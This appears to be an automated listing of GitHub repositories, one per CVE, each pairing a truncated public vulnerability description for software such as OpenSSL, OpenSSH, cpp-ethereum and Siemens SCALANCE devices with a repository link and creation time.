**sshd in OpenSSH before 7.4, when privilege separation is not used, creates forwarded Unix-domain sockets as root, which might allow local users to gain privileges via unspecified vectors, related to serverloop.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-10010](https://github.com/Live-Hack-CVE/CVE-2016-10010) create time: 2022-12-27T18:19:38Z

**The SSLv2 protocol, as used in OpenSSL before 1.0.1s and 1.0.2 before 1.0.2g and other products, requires a server to send a ServerVerify message before establishing that a client possesses certain plaintext RSA data, which makes it easier for remote attackers to decrypt TLS ciphertext data by leveraging a Bleichenbach CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0800](https://github.com/Live-Hack-CVE/CVE-2016-0800) create time: 2022-12-27T18:19:26Z

**The shared memory manager (associated with pre-authentication compression) in sshd in OpenSSH before 7.4 does not ensure that a bounds check is enforced by all compilers, which might allows local users to gain privileges by leveraging access to a sandboxed privilege-separation process, related to the m_zback and m_zlib CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-10012](https://github.com/Live-Hack-CVE/CVE-2016-10012) create time: 2022-12-27T18:19:23Z

**Integer overflow in the EVP_EncodeUpdate function in crypto/evp/encode.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (heap memory corruption) via a large amount of binary data. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-2105](https://github.com/Live-Hack-CVE/CVE-2016-2105) create time: 2022-12-27T18:18:29Z

**The TS_OBJ_print_bio function in crypto/ts/ts_lib.c in the X.509 Public Key Infrastructure Time-Stamp Protocol (TSP) implementation in OpenSSL through 1.0.2h allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted time-stamp file that is mishandled by the "openssl t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-2180](https://github.com/Live-Hack-CVE/CVE-2016-2180) create time: 2022-12-27T18:18:24Z

**OpenSSL through 1.0.2h incorrectly uses pointer arithmetic for heap-buffer boundary checks, which might allow remote attackers to cause a denial of service (integer overflow and application crash) or possibly have unspecified other impact by leveraging unexpected malloc behavior, related to s3_srvr.c, ssl_sess.c, and t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-2177](https://github.com/Live-Hack-CVE/CVE-2016-2177) create time: 2022-12-27T18:18:17Z

**The ssh_packet_read_poll2 function in packet.c in OpenSSH before 7.1p2 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via crafted network traffic. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-1907](https://github.com/Live-Hack-CVE/CVE-2016-1907) create time: 2022-12-27T18:18:11Z

**The dsa_sign_setup function in crypto/dsa/dsa_ossl.c in OpenSSL through 1.0.2h does not properly ensure the use of constant-time operations, which makes it easier for local users to discover a DSA private key via a timing side-channel attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-2178](https://github.com/Live-Hack-CVE/CVE-2016-2178) create time: 2022-12-27T18:18:07Z

**The BN_bn2dec function in crypto/bn/bn_print.c in OpenSSL before 1.1.0 does not properly validate division results, which allows remote attackers to cause a denial of service (out-of-bounds write and application crash) or possibly have unspecified other impact via unknown vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-2182](https://github.com/Live-Hack-CVE/CVE-2016-2182) create time: 2022-12-27T18:18:00Z

**The AES-NI implementation in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h does not consider memory allocation during a certain padding check, which allows remote attackers to obtain sensitive cleartext information via a padding-oracle attack against an AES CBC session. NOTE: this vulnerability exists because of an inc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-2107](https://github.com/Live-Hack-CVE/CVE-2016-2107) create time: 2022-12-27T18:17:57Z

**The ASN.1 implementation in OpenSSL before 1.0.1o and 1.0.2 before 1.0.2c allows remote attackers to execute arbitrary code or cause a denial of service (buffer underflow and memory corruption) via an ANY field in crafted serialized data, aka the "negative zero" issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-2108](https://github.com/Live-Hack-CVE/CVE-2016-2108) create time: 2022-12-27T18:17:54Z

**The Anti-Replay feature in the DTLS implementation in OpenSSL before 1.1.0 mishandles early use of a new epoch number in conjunction with a large sequence number, which allows remote attackers to cause a denial of service (false-positive packet drops) via spoofed DTLS records, related to rec_layer_d1.c and ssl3_record. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-2181](https://github.com/Live-Hack-CVE/CVE-2016-2181) create time: 2022-12-27T18:17:50Z

**The client in OpenSSH before 7.2 mishandles failed cookie generation for untrusted X11 forwarding and relies on the local X11 server for access-control decisions, which allows remote X11 clients to trigger a fallback and obtain trusted X11 forwarding privileges by leveraging configuration issues on this X11 server, as CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-1908](https://github.com/Live-Hack-CVE/CVE-2016-1908) create time: 2022-12-27T18:17:46Z

**The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in the ASN.1 BIO implementation in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (memory consumption) via a short invalid encoding. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-2109](https://github.com/Live-Hack-CVE/CVE-2016-2109) create time: 2022-12-27T18:17:43Z

**The X509_NAME_oneline function in crypto/x509/x509_obj.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to obtain sensitive information from process stack memory or cause a denial of service (buffer over-read) via crafted EBCDIC ASN.1 data. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-2176](https://github.com/Live-Hack-CVE/CVE-2016-2176) create time: 2022-12-27T18:17:33Z

**The DTLS implementation in OpenSSL before 1.1.0 does not properly restrict the lifetime of queue entries associated with unused out-of-order messages, which allows remote attackers to cause a denial of service (memory consumption) by maintaining many crafted DTLS sessions simultaneously, related to d1_lib.c, statem_dtl CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-2179](https://github.com/Live-Hack-CVE/CVE-2016-2179) create time: 2022-12-27T18:17:29Z

**Integer overflow in the EVP_EncryptUpdate function in crypto/evp/evp_enc.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (heap memory corruption) via a large amount of data. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-2106](https://github.com/Live-Hack-CVE/CVE-2016-2106) create time: 2022-12-27T18:17:18Z

**The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-2183](https://github.com/Live-Hack-CVE/CVE-2016-2183) create time: 2022-12-27T18:17:15Z

**The ssl3_read_bytes function in record/rec_layer_s3.c in OpenSSL 1.1.0 before 1.1.0a allows remote attackers to cause a denial of service (infinite loop) by triggering a zero-length record in an SSL_peek call. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6305](https://github.com/Live-Hack-CVE/CVE-2016-6305) create time: 2022-12-27T18:16:33Z

**Integer overflow in the MDC2_Update function in crypto/mdc2/mdc2dgst.c in OpenSSL before 1.1.0 allows remote attackers to cause a denial of service (out-of-bounds write and application crash) or possibly have unspecified other impact via unknown vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6303](https://github.com/Live-Hack-CVE/CVE-2016-6303) create time: 2022-12-27T18:16:12Z

**Multiple memory leaks in t1_lib.c in OpenSSL before 1.0.1u, 1.0.2 before 1.0.2i, and 1.1.0 before 1.1.0a allow remote attackers to cause a denial of service (memory consumption) via large OCSP Status Request extensions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6304](https://github.com/Live-Hack-CVE/CVE-2016-6304) create time: 2022-12-27T18:16:09Z

**The certificate parser in OpenSSL before 1.0.1u and 1.0.2 before 1.0.2i might allow remote attackers to cause a denial of service (out-of-bounds read) via crafted certificate operations, related to s3_clnt.c and s3_srvr.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6306](https://github.com/Live-Hack-CVE/CVE-2016-6306) create time: 2022-12-27T18:16:05Z

**sshd in OpenSSH before 7.3, when SHA256 or SHA512 are used for user password hashing, uses BLOWFISH hashing on a static password when the username does not exist, which allows remote attackers to enumerate users by leveraging the timing difference between responses when a large password is provided. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6210](https://github.com/Live-Hack-CVE/CVE-2016-6210) create time: 2022-12-27T18:16:02Z

**The state-machine implementation in OpenSSL 1.1.0 before 1.1.0a allocates memory before checking for an excessive length, which might allow remote attackers to cause a denial of service (memory consumption) via crafted TLS messages, related to statem/statem.c and statem/statem_lib.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6307](https://github.com/Live-Hack-CVE/CVE-2016-6307) create time: 2022-12-27T18:15:57Z

**The tls_decrypt_ticket function in ssl/t1_lib.c in OpenSSL before 1.1.0 does not consider the HMAC size during validation of the ticket length, which allows remote attackers to cause a denial of service via a ticket that is too short. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6302](https://github.com/Live-Hack-CVE/CVE-2016-6302) create time: 2022-12-27T18:15:53Z

**statem/statem_dtls.c in the DTLS implementation in OpenSSL 1.1.0 before 1.1.0a allocates memory before checking for an excessive length, which might allow remote attackers to cause a denial of service (memory consumption) via crafted DTLS messages. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6308](https://github.com/Live-Hack-CVE/CVE-2016-6308) create time: 2022-12-27T18:15:50Z

**The process_open function in sftp-server.c in OpenSSH before 7.6 does not properly prevent write operations in readonly mode, which allows attackers to create zero-length files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-15906](https://github.com/Live-Hack-CVE/CVE-2017-15906) create time: 2022-12-27T18:17:40Z

**While parsing an IPAddressFamily extension in an X.509 certificate, it is possible to do a one-byte overread. This would result in an incorrect text display of the certificate. This bug has been present since 2006 and is present in all versions of OpenSSL before 1.0.2m and 1.1.0g. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-3735](https://github.com/Live-Hack-CVE/CVE-2017-3735) create time: 2022-12-27T18:15:47Z

**An exploitable improper authorization vulnerability exists in admin_addPeer API of cpp-ethereum's JSON-RPC (commit 4e1015743b95821849d001618a7ce82c7c073768). A JSON request can cause an access to the restricted functionality resulting in authorization bypass. An attacker can send JSON to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12112](https://github.com/Live-Hack-CVE/CVE-2017-12112) create time: 2022-12-27T17:29:28Z

**An exploitable improper authorization vulnerability exists in admin_nodeInfo API of cpp-ethereum's JSON-RPC (commit 4e1015743b95821849d001618a7ce82c7c073768). A JSON request can cause an access to the restricted functionality resulting in authorization bypass. An attacker can send JSON to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12113](https://github.com/Live-Hack-CVE/CVE-2017-12113) create time: 2022-12-27T17:29:21Z

**An exploitable improper authorization vulnerability exists in admin_peers API of cpp-ethereum's JSON-RPC (commit 4e1015743b95821849d001618a7ce82c7c073768). A JSON request can cause an access to the restricted functionality resulting in authorization bypass. An attacker can send JSON to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12114](https://github.com/Live-Hack-CVE/CVE-2017-12114) create time: 2022-12-27T17:29:18Z

**An exploitable improper authorization vulnerability exists in miner_setEtherbase API of cpp-ethereum's JSON-RPC (commit 4e1015743b95821849d001618a7ce82c7c073768). A JSON request can cause an access to the restricted functionality resulting in authorization bypass. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12115](https://github.com/Live-Hack-CVE/CVE-2017-12115) create time: 2022-12-27T17:29:11Z

**An exploitable improper authorization vulnerability exists in miner_setGasPrice API of cpp-ethereum's JSON-RPC (commit 4e1015743b95821849d001618a7ce82c7c073768). A JSON request can cause an access to the restricted functionality resulting in authorization bypass. An attacker can send JSON to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12116](https://github.com/Live-Hack-CVE/CVE-2017-12116) create time: 2022-12-27T17:29:04Z

**An exploitable improper authorization vulnerability exists in miner_start API of cpp-ethereum's JSON-RPC (commit 4e1015743b95821849d001618a7ce82c7c073768). A JSON request can cause an access to the restricted functionality resulting in authorization bypass. An attacker can send JSON to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12117](https://github.com/Live-Hack-CVE/CVE-2017-12117) create time: 2022-12-27T17:28:57Z

**An exploitable improper authorization vulnerability exists in miner_stop API of cpp-ethereum's JSON-RPC (commit 4e1015743b95821849d001618a7ce82c7c073768). An attacker can send JSON to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12118](https://github.com/Live-Hack-CVE/CVE-2017-12118) create time: 2022-12-27T17:28:53Z

**An exploitable unhandled exception vulnerability exists in multiple APIs of CPP-Ethereum JSON-RPC. Specially crafted JSON requests can cause an unhandled exception resulting in denial of service. An attacker can send malicious JSON to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12119](https://github.com/Live-Hack-CVE/CVE-2017-12119) create time: 2022-12-27T17:28:46Z

**An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation, resulting in a root shell. An attacker can inject OS commands into the ip= parm in the "/goform/net_WebPingGetValue" URI to trigger t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12120](https://github.com/Live-Hack-CVE/CVE-2017-12120) create time: 2022-12-27T17:28:39Z

**An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation resulting in root shell. An attacker can inject OS commands into the rsakey\_name= parm in the "/goform/WebRSAKEYGen" uri to trigger t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12121](https://github.com/Live-Hack-CVE/CVE-2017-12121) create time: 2022-12-27T17:28:35Z

**An exploitable code execution vulnerability exists in the ILBM image rendering functionality of SDL2_image-2.0.2. A specially crafted ILBM image can cause a heap overflow resulting in code execution. An attacker can display a specially crafted image to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12122](https://github.com/Live-Hack-CVE/CVE-2017-12122) create time: 2022-12-27T17:28:32Z

**An exploitable NULL pointer dereference vulnerability exists in the tinysvcmdns library version 2017-11-05. A specially crafted packet can make the library dereference a NULL pointer leading to a server crash and denial of service. An attacker needs to send a DNS query to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12130](https://github.com/Live-Hack-CVE/CVE-2017-12130) create time: 2022-12-27T17:28:29Z

**An exploitable information leak vulnerability exists in Insteon Hub running firmware version 1012. The HTTP server implementation incorrectly checks the number of GET parameters supplied, leading to an arbitrarily controlled information leak on the whole device memory. An attacker can send an authenticated HTTP request CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14443](https://github.com/Live-Hack-CVE/CVE-2017-14443) create time: 2022-12-27T17:28:25Z

**An exploitable buffer overflow vulnerability exists in Insteon Hub running firmware version 1012. The HTTP server implementation incorrectly handles the URL parameter during a firmware update request, leading to a buffer overflow on a global section. An attacker can send an HTTP GET request to trigger this vulnerabilit CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14444](https://github.com/Live-Hack-CVE/CVE-2017-14444) create time: 2022-12-27T17:28:22Z

**An exploitable buffer overflow vulnerability exists in Insteon Hub running firmware version 1012. The HTTP server implementation incorrectly handles the host parameter during a firmware update request, leading to a buffer overflow on a global section. An attacker can send an HTTP GET request to trigger this vulnerabili CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14445](https://github.com/Live-Hack-CVE/CVE-2017-14445) create time: 2022-12-27T17:28:11Z

**An exploitable stack-based buffer overflow vulnerability exists in Insteon Hub running firmware version 1012. The HTTP server implementation unsafely extracts parameters from the query string, leading to a buffer overflow on the stack. An attacker can send an HTTP GET request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14446](https://github.com/Live-Hack-CVE/CVE-2017-14446) create time: 2022-12-27T17:28:04Z

**An exploitable access control vulnerability exists in the data, program, and function file permissions functionality of Allen Bradley Micrologix 1400 Series B FRN 21.2 and before. A specially crafted packet can cause a read or write operation resulting in disclosure of sensitive information, modification of settings, o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14462](https://github.com/Live-Hack-CVE/CVE-2017-14462) create time: 2022-12-27T17:27:55Z

**An exploitable access control vulnerability exists in the data, program, and function file permissions functionality of Allen Bradley Micrologix 1400 Series B FRN 21.2 and before. A specially crafted packet can cause a read or write operation resulting in disclosure of sensitive information, modification of settings, o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14463](https://github.com/Live-Hack-CVE/CVE-2017-14463) create time: 2022-12-27T17:27:23Z

**An exploitable access control vulnerability exists in the data, program, and function file permissions functionality of Allen Bradley Micrologix 1400 Series B FRN 21.2 and before. A specially crafted packet can cause a read or write operation resulting in disclosure of sensitive information, modification of settings, o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14464](https://github.com/Live-Hack-CVE/CVE-2017-14464) create time: 2022-12-27T17:27:20Z

**An exploitable access control vulnerability exists in the data, program, and function file permissions functionality of Allen Bradley Micrologix 1400 Series B FRN 21.2 and before. A specially crafted packet can cause a read or write operation resulting in disclosure of sensitive information, modification of settings, o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14466](https://github.com/Live-Hack-CVE/CVE-2017-14466) create time: 2022-12-27T17:27:16Z

**An exploitable access control vulnerability exists in the data, program, and function file permissions functionality of Allen Bradley Micrologix 1400 Series B FRN 21.2 and before. A specially crafted packet can cause a read or write operation resulting in disclosure of sensitive information, modification of settings, o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14465](https://github.com/Live-Hack-CVE/CVE-2017-14465) create time: 2022-12-27T17:27:12Z

**An exploitable access control vulnerability exists in the data, program, and function file permissions functionality of Allen Bradley Micrologix 1400 Series B FRN 21.2 and before. A specially crafted packet can cause a read or write operation resulting in disclosure of sensitive information, modification of settings, o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14467](https://github.com/Live-Hack-CVE/CVE-2017-14467) create time: 2022-12-27T17:27:09Z

**An exploitable access control vulnerability exists in the data, program, and function file permissions functionality of Allen Bradley Micrologix 1400 Series B FRN 21.2 and before. A specially crafted packet can cause a read or write operation resulting in disclosure of sensitive information, modification of settings, o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14468](https://github.com/Live-Hack-CVE/CVE-2017-14468) create time: 2022-12-27T17:27:04Z

**OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-15473](https://github.com/Live-Hack-CVE/CVE-2018-15473) create time: 2022-12-27T18:15:39Z

**In OpenSSH 7.9, scp.c in the scp client allows remote SSH servers to bypass intended access restrictions via the filename of . or an empty filename. The impact is modifying the permissions of the target directory on the client side. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-20685](https://github.com/Live-Hack-CVE/CVE-2018-20685) create time: 2022-12-27T18:15:29Z

**zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25032](https://github.com/Live-Hack-CVE/CVE-2018-25032) create time: 2022-12-27T18:15:07Z

**An exploitable buffer overflow vulnerability exists in the credentials handler of video-core's HTTP server of Samsung SmartThings Hub STH-ETH-250 - Firmware version 0.20.17. The video-core process incorrectly extracts the videoHostUrl field from a user-controlled JSON payload, leading to a buffer overflow on the stack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3872](https://github.com/Live-Hack-CVE/CVE-2018-3872) create time: 2022-12-27T18:13:48Z

**A vulnerability has been identified in SCALANCE X-200IRT switch family (incl. SIPLUS NET variants) (All versions < V5.4.1), SCALANCE X-200RNA switch family (All versions < V3.2.7), SCALANCE X-300 switch family (incl. X408 and SIPLUS NET variants) (All versions < V4.1.3). A remote, authenticated attacker with access to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-4842](https://github.com/Live-Hack-CVE/CVE-2018-4842) create time: 2022-12-27T18:10:26Z

**A vulnerability has been identified in SCALANCE X-200 switch family (incl. SIPLUS NET variants) (All versions < V5.2.3), SCALANCE X-200IRT switch family (incl. SIPLUS NET variants) (All versions < V5.4.1), SCALANCE X-200RNA switch family (All versions < V3.2.7), SCALANCE X-300 switch family (incl. X408 and SIPLUS NET v CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-4848](https://github.com/Live-Hack-CVE/CVE-2018-4848) create time: 2022-12-27T18:10:21Z

**OpenSSL has internal defaults for a directory tree where it can find a configuration file as well as certificates used for verification in TLS. This directory is most commonly referred to as OPENSSLDIR, and is configurable with the --prefix / --openssldir configuration options. For OpenSSL versions 1.1.0 and 1.1.1, the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-1552](https://github.com/Live-Hack-CVE/CVE-2019-1552) create time: 2022-12-27T18:16:19Z

**An issue was discovered in OpenSSH 7.9. Due to the scp implementation being derived from 1983 rcp, the server chooses which files/directories are sent to the client. However, the scp client only performs cursory validation of the object name returned (only directory traversal attacks are prevented). A malicious scp ser CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6111](https://github.com/Live-Hack-CVE/CVE-2019-6111) create time: 2022-12-27T18:15:32Z

**OpenSSH 7.7 through 7.9 and 8.x before 8.1, when compiled with an experimental key type, has a pre-authentication integer overflow if a client or server is configured to use a crafted XMSS key. This leads to memory corruption and local code execution because of an error in the XMSS key parsing algorithm. NOTE: the XMSS CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16905](https://github.com/Live-Hack-CVE/CVE-2019-16905) create time: 2022-12-27T18:15:17Z

**An issue was discovered in OpenSSH 7.9. Due to missing character encoding in the progress display, a malicious server (or Man-in-The-Middle attacker) can employ crafted object names to manipulate the client output, e.g., by using ANSI control codes to hide additional files being transferred. This affects refresh_progre CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6109](https://github.com/Live-Hack-CVE/CVE-2019-6109) create time: 2022-12-27T18:15:14Z

**In OpenSSH 7.9, due to accepting and displaying arbitrary stderr output from the server, a malicious server (or Man-in-The-Middle attacker) can manipulate the client output, for example to use ANSI control codes to hide additional files being transferred. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6110](https://github.com/Live-Hack-CVE/CVE-2019-6110) create time: 2022-12-27T18:15:11Z

**MCPP 2.7.2 has a heap-based buffer overflow in the do_msg() function in support.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14274](https://github.com/Live-Hack-CVE/CVE-2019-14274) create time: 2022-12-27T18:14:35Z

**A vulnerability has been identified in Development/Evaluation Kits for PROFINET IO: DK Standard Ethernet Controller, Development/Evaluation Kits for PROFINET IO: EK-ERTEC 200, Development/Evaluation Kits for PROFINET IO: EK-ERTEC 200P, SIMATIC CFU PA, SIMATIC ET 200S IM151-8 PN/DP CPU, SIMATIC ET 200S IM151-8F PN/DP CP CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10936](https://github.com/Live-Hack-CVE/CVE-2019-10936) create time: 2022-12-27T18:10:40Z

**A vulnerability has been identified in SCALANCE S602 (All versions < V4.1), SCALANCE S612 (All versions < V4.1), SCALANCE S623 (All versions < V4.1), SCALANCE S627-2M (All versions < V4.1), SCALANCE X-200 switch family (incl. SIPLUS NET variants) (All versions < 5.2.4), SCALANCE X-200IRT switch family (incl. SIPLUS NET CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13924](https://github.com/Live-Hack-CVE/CVE-2019-13924) create time: 2022-12-27T18:10:37Z

**A vulnerability has been identified in SCALANCE X204RNA (HSR), SCALANCE X204RNA (PRP), SCALANCE X204RNA EEC (HSR), SCALANCE X204RNA EEC (PRP), SCALANCE X204RNA EEC (PRP/HSR), SCALANCE X302-7 EEC (230V), SCALANCE X302-7 EEC (230V, coated), SCALANCE X302-7 EEC (24V), SCALANCE X302-7 EEC (24V, coated), SCALANCE X302-7 EEC CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13933](https://github.com/Live-Hack-CVE/CVE-2019-13933) create time: 2022-12-27T18:10:33Z

**A vulnerability has been identified in Development/Evaluation Kits for PROFINET IO: EK-ERTEC 200 (All versions), Development/Evaluation Kits for PROFINET IO: EK-ERTEC 200P (All versions), KTK ATE530S (All versions), SIDOOR ATD430W (All versions), SIDOOR ATE530S COATED (All versions), SIDOOR ATE531S (All versions), SIMA CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19300](https://github.com/Live-Hack-CVE/CVE-2019-19300) create time: 2022-12-27T18:10:17Z

**Exfiltration of Data in McAfee Web Gateway (MWG) 7.8.2.x prior to 7.8.2.12 allows attackers to obtain sensitive data via crafting a complex webpage that will trigger the Web Gateway to block the user accessing an iframe. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3635](https://github.com/Live-Hack-CVE/CVE-2019-3635) create time: 2022-12-27T18:08:22Z

**Reflected Cross Site Scripting vulnerability in Administrators web console in McAfee Web Gateway (MWG) 7.8.x prior to 7.8.2.13 allows remote attackers to collect sensitive information or execute commands with the MWG administrator's credentials via tricking the administrator to click on a carefully constructed maliciou CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3638](https://github.com/Live-Hack-CVE/CVE-2019-3638) create time: 2022-12-27T18:08:18Z

**A vulnerability in the logic that handles access control to one of the hardware components in Cisco's proprietary Secure Boot implementation could allow an authenticated, local attacker to write a modified firmware image to the component. This vulnerability affects multiple Cisco products that support hardware-based Se CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-1649](https://github.com/Live-Hack-CVE/CVE-2019-1649) create time: 2022-12-27T17:35:47Z

**In TypeStack class-validator 0.10.2, validate() input validation can be bypassed because certain internal attributes can be overwritten via a conflicting name. Even though there is an optional forbidUnknownValues parameter that can be used to reduce the risk of this bypass, this option is not documented and thus most d CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-18413](https://github.com/Live-Hack-CVE/CVE-2019-18413) create time: 2022-12-27T17:30:27Z

**PostgreSQL JDBC Driver (aka PgJDBC) before 42.2.13 allows XXE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13692](https://github.com/Live-Hack-CVE/CVE-2020-13692) create time: 2022-12-27T18:13:51Z

**A vulnerability in the authenticated user web interface of Pulse Connect Secure and Pulse Policy Secure < 9.1R8.2 could allow attackers to conduct Cross-Site Scripting (XSS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8238](https://github.com/Live-Hack-CVE/CVE-2020-8238) create time: 2022-12-27T18:13:01Z

**Icinga Icinga Web2 2.0.0 through 2.6.4, 2.7.4 and 2.8.2 has a Directory Traversal vulnerability which allows an attacker to access arbitrary files that are readable by the process running Icinga Web 2. This issue is fixed in Icinga Web 2 in v2.6.4, v2.7.4 and v2.8.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24368](https://github.com/Live-Hack-CVE/CVE-2020-24368) create time: 2022-12-27T18:12:58Z

**A vulnerability in the Pulse Connect Secure < 9.1R8.2 admin web interface could allow an authenticated attacker to gain arbitrary file reading access through Pulse Collaboration via XML External Entity (XXE) vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8256](https://github.com/Live-Hack-CVE/CVE-2020-8256) create time: 2022-12-27T18:12:55Z

**There are multiple unauthenticated directory traversal vulnerabilities in different FTP commands in uftpd FTP server versions 2.7 to 2.10 due to improper implementation of a chroot jail in common.c's compose_abspath function that can be abused to read or write to arbitrary files on the filesystem, leak process memory, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-20277](https://github.com/Live-Hack-CVE/CVE-2020-20277) create time: 2022-12-27T18:12:51Z

**A vulnerability has been identified in APOGEE PXC Series (BACnet) (All versions < V3.5.5), APOGEE PXC Series (P2 Ethernet) (All versions < V2.8.20), Nucleus NET (All versions < V5.2), Nucleus ReadyStart V3 (All versions < V2012.12), Nucleus Source Code (All versions), PLUSCONTROL 1st Gen (All versions), TALON TC Series CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28388](https://github.com/Live-Hack-CVE/CVE-2020-28388) create time: 2022-12-27T18:12:30Z

**A vulnerability has been identified in SIMATIC Automation Tool (All versions < V4 SP2), SIMATIC NET PC Software V14 (All versions < V14 SP1 Update 14), SIMATIC NET PC Software V15 (All versions), SIMATIC NET PC Software V16 (All versions < V16 Upd3), SIMATIC PCS neo (All versions < V3.0 SP1), SIMATIC ProSave (All versi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7580](https://github.com/Live-Hack-CVE/CVE-2020-7580) create time: 2022-12-27T18:10:29Z

